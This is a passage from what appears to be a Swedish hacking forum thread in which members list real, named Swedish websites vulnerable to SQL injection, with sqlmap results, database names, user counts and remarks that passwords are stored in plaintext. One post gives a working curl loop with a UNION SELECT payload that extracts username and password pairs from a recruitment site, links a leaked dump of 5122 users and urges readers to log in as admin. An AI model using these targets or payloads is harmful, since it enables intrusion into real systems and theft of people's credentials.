2014-05-19, 15:40
  #4309
Medlem
http://www.magicmovies.se/singalong.asp?id=1&kat=film

MySQL UNION query (NULL) - 3 columns
  • available databases [6]:
  • adrina07
  • awlog
  • galleri
  • gallery
  • information_schema
  • temp
Citera
2014-05-19, 22:25
  #4310
Medlem
Citat:
Ursprungligen postat av unhandledexception
Lite väl mycket debug till allmänheten. Någon som kan hitta på någonting kreativt?
http://www.rocknytt.net/festival/11336-komplett-spelschema-bravalla-festival

Det finns en del funktioner som ser ut o vara admin-funktioner.
känns som att dom är ute o fiskar i grumligt vatten.

Citera
2014-05-25, 12:38
  #4311
Medlem
http://www.sportfiskegiganten.se/nyheter/arkiv/?ar=2014&man=09

MySQL >= 5.0 AND error-based
  • available databases [9]:
  • alumni
  • alumni_jatiba_com
  • Henric_gigant
  • information_schema
  • mastiff_jatiba_com
  • mysql
  • performance_schema
  • sporting_se
  • test

passwords i klartext
Citera
2014-05-28, 21:38
  #4312
Medlem
http://www.recepthjalpen.se/methods_by_cat.php?catID=1

MySQL UNION query (NULL) - 5 columns
  • available databases [2]:
  • information_schema
  • recepthjalpen_se_db_1

Count of recepthjalpen_se_db_1.mf_user is 7382 och passwords i klartext
Citera
2014-05-29, 18:16
  #4313
Medlem
http://alphaspel.se/shop/cart.php/

Place: URI
Parameter: #1*
blind metod
  • available databases [2]:
  • alphaspel
  • information_schema
Citera
2014-06-02, 19:45
  #4314
Medlem
http://www.jt.se/page.asp?id=2

MySQL UNION query (NULL) - 2 columns
  • available databases [2]:
  • information_schema
  • wu100338
Citera
2014-06-04, 18:02
  #4315
Medlem
http://www.bikester.se/cykeldelar/pakethaallare.html?page=1

blind metod och enligt sqlmap 25 databas
Citera
2014-06-06, 20:14
  #4316
Medlem
Edit:
Detta är tydligen en tjänst som reryktrerar folk åt kommuner, skolor, mm! Logga in som admin och sätt dig själv som status "intressant" om du vill ha jobb




https://hrsupporten-se.loopiasecure.com/ad_container.php?jobid=8653

Notera "loopiasecure" i adressen, det gör det hela roligare.


5122 users, lösenord i klartext.

Dump: https://anonfiles.com/file/40317c488ba1328bb677bee0c5cb3f41

Script:
Kod:
#!/bin/bash

for i in {0..5144..20}
do
    curl "https://hrsupporten-se.loopiasecure.com/ad_container.php?jobid=-8653%20union%20all%20select%201,2,%28SELECT%20concat%28%27|%27,group_concat%  28data%29,%27|%27%29%20FROM%20%28SELECT%20CONCAT%28username,0x3a,password%29%20as%20data%20FROM%20us  ers%20LIMIT%2020%20OFFSET%20${i}%29%20as%20t%29,4,5,6,7,8,9,0,0,0,0,0,0,0,0,0,0,0--" >> tmp
echo $i
done

Ps till alla sqlmappare: SQLMap kör med blint metod, det behövs inte, allt går att få ut på normalt sätt manuellt.



PS, här loggar man in:
https://hrsupporten-se.loopiasecure.com/login_form.php?lang=1
__________________
Senast redigerad av Abnormius 2014-06-06 kl. 20:24.
Citera
2014-06-06, 23:48
  #4317
Medlem
Citat:
Ursprungligen postat av Abnormius
Edit:
Detta är tydligen en tjänst som reryktrerar folk åt kommuner, skolor, mm! Logga in som admin och sätt dig själv som status "intressant" om du vill ha jobb
Varför ska man göra det? Du har med detta inlägg förstört alla chanser till att utnyttja hållet. Förmodar att du får någon sorts kick av att skryta om hur duktig du är med att posta säkerhetshål och dumpar här, vilket givetvis förstör alla möjligheter till att på något sätt utnyttja hålet och dumpen till sin fördel.
Ta gärna och tänk över dina beslut i fortsättningen.
Citera
2014-06-07, 00:12
  #4318
Medlem
Citat:
Ursprungligen postat av SweCrime
Varför ska man göra det? Du har med detta inlägg förstört alla chanser till att utnyttja hållet. Förmodar att du får någon sorts kick av att skryta om hur duktig du är med att posta säkerhetshål och dumpar här, vilket givetvis förstör alla möjligheter till att på något sätt utnyttja hålet och dumpen till sin fördel.
Ta gärna och tänk över dina beslut i fortsättningen.

Om du har något emot FD så kan du gå någon annanstans.
Citera
2014-06-07, 09:26
  #4319
Medlem
SpecialEditions avatar
Citat:
Ursprungligen postat av SweCrime
Varför ska man göra det? Du har med detta inlägg förstört alla chanser till att utnyttja hållet. Förmodar att du får någon sorts kick av att skryta om hur duktig du är med att posta säkerhetshål och dumpar här, vilket givetvis förstör alla möjligheter till att på något sätt utnyttja hålet och dumpen till sin fördel.
Ta gärna och tänk över dina beslut i fortsättningen.
Hur ska folk annars få vetskap om hålet?
Citera
2014-06-07, 13:49
  #4320
Medlem
Citat:
Ursprungligen postat av SweCrime
Varför ska man göra det? Du har med detta inlägg förstört alla chanser till att utnyttja hållet. Förmodar att du får någon sorts kick av att skryta om hur duktig du är med att posta säkerhetshål och dumpar här, vilket givetvis förstör alla möjligheter till att på något sätt utnyttja hålet och dumpen till sin fördel.
Ta gärna och tänk över dina beslut i fortsättningen.
Jag lägger inte ut länkar och dumpar här av anledning att folk ska kunna fuska sig till fördelar. Att ändra sina egna uppgifter var snarare ett skämt för att visa vad som är möjligt när ett sådant hål finns. Ser du inte ironin i att ett sådant viktigt system har så dålig säkerhet?

Ingen blir gladare än jag om jag förstört dina möjligheter till att fuska till dig fördelar på arbetsmarknaden.


Anledningen till den här tråden, som jag förstått det, är för att ge intresserade möjlighet att testa sina kunskaper inom webbsäkerhet. Om jag inte lägger ut dumpen får jag massa förfrågningar efter den eftersom folk vill fylla på sina wordlists för attacker mot andra sajter.
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in